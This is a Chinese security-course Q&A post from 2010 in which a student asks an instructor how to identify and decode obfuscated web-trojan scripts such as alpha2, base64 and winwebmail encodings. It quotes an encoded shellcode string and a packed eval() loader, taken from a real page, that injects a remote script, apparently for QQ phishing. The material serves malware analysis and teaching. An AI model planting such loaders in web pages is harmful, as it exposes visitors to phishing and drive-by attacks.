2010年7月15日 签到 实习生--cherish77
【Q&A】
1、网马之间的区别。我认为其他网马都有可能是大小写数字混排的,怎么区分它是BASE64的?比如alpha2不也是乱七八糟的,如没看到TYTIIIIIIIIIIIII我觉得很像BASE64。是不是主要判断最后有没有=?但是不是也可能没有啊?有没有判断的先后顺序?
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★以下为networkedition回复:教程中将各种加密方法的特征都写的很清楚,可以直接对照着来看,符合相应的特征了,那么自然也就知道使用的是什么加密了。教程中总结出来的特征一般情况下都是符合相应的加密特征。例:以TYTIIIIIIIIIIIII开头的代码肯定就是alpha2加密了,而如果在代码后面有形如==之类的就是base64加密,简单记忆总结出常见网马加密的特征。对于使用哪种解密方法还是很有用处的。 2、还是关于网马之间的区别。下面这个是“document.write解密CSS源代码”
Shell9="b4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSQTnsSPdQt5a6NRC2OPmfOpmTn1srSt3OpWp";
这个也并没有TYTIIIIIIIIIIIII啊?怎么判断出是alpha2?
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★
以下为networkedition回复:这个是alpha2加密的一个特例,找RHptd4,他后面就是URL地址(即网马地址)。 3、解winwebmail,时为什么密匙是1233,代码部分,不是document.write(unencode(webmm,3422)),不是应该是3422?还有我把winwebmail又和document.write有点混了,不都是在document.write函数里吗?document.write函数里面有(unencode(webmm,就是winwebmail?不是就是document.write?
如果winwebmail用document.write方式解,即把document.write变为alert,怎么只出个<SCR=
这样子如果真是病毒的话是不是就已经中招了?
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★
以下为networkedition回复:这是有两种解密方法,第一可以使用freshow的winwebmail来直接进行解密,解密时需要手动添加密钥。密钥应为:3422。第二,可以使用document.write替换为alert方法来进行解密,当遇到一个不会解密网马时,首先可以查找代码中是否有eval或document.write这个两个函数,这样解密起来就容易了。alert方法会出现代码截断现象,如果代码太长,建议使用redoce的documen.write清除来进行解密。 4、Winwebmail解密源代码,我一开始处理为
66708666536666966654"//666636665666652667366665366 (剩下省略)
我解出来的就是一大堆乱七八糟的东西,仔细看您的讲义,发现删除了"// ,请问"//是什么?
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★
以下为networkedition回复:干扰字符吧,有些网马就是这样里面有很多无用的字符,将其替换为空即可。 5、
networkedition老师,请问如果网马解密中遇到加密的代码,如何得到解密的密钥呢?★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★
以下为networkedition回复:1. 可以通过猜解的方法得到密钥,这个需要解密的经验。2. 直接使用OD工具进行调试shellcode,得出密钥。3. 使用shellcode自动解密工具(此方法不推荐使用)。4。freshow的enumxor有自动枚举密钥的功能,一般常见的带密钥的shellcode都可以枚举出。6、 老师,在浏览网页的时间,我发现一个网页也被拦截,后查看代码,在head和body之间的代码如下:
<Script language="javascript">
<!--
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b.a(\'<9 8="7://6.5.4/3/0/2.0"></1>\');',12,12,'js|script|dtree|web|com|qqcn2010|www|http|src|SCRIPT|write|document'.split('|'),0,{}))
-->
</Script>
请问下老师这是不是个QQ钓鱼的代码!谢谢老师
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★以下为 networkedition回复:不错呀,你都学会找eval加密了。解密出是个js,大概看了一下代码,ms是qq钓鱼弹窗之类的。7、老大 怎么看一个挂马网页利用的什么漏洞
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★
以下为 networkedition回复:讲义没有讲嘛,可以通过clsid来进行判断,还有就是网页的地址的命名,如:14.htm或014.htm这里都是指利用的ms06-014这个漏洞。 【PS】对于这块不是很熟悉,不过看了讲义觉得还蛮有意思的,有时间自己试试吧~~
O(∩_∩)O谢谢
networkedition老师的答复,辛苦皮班~~
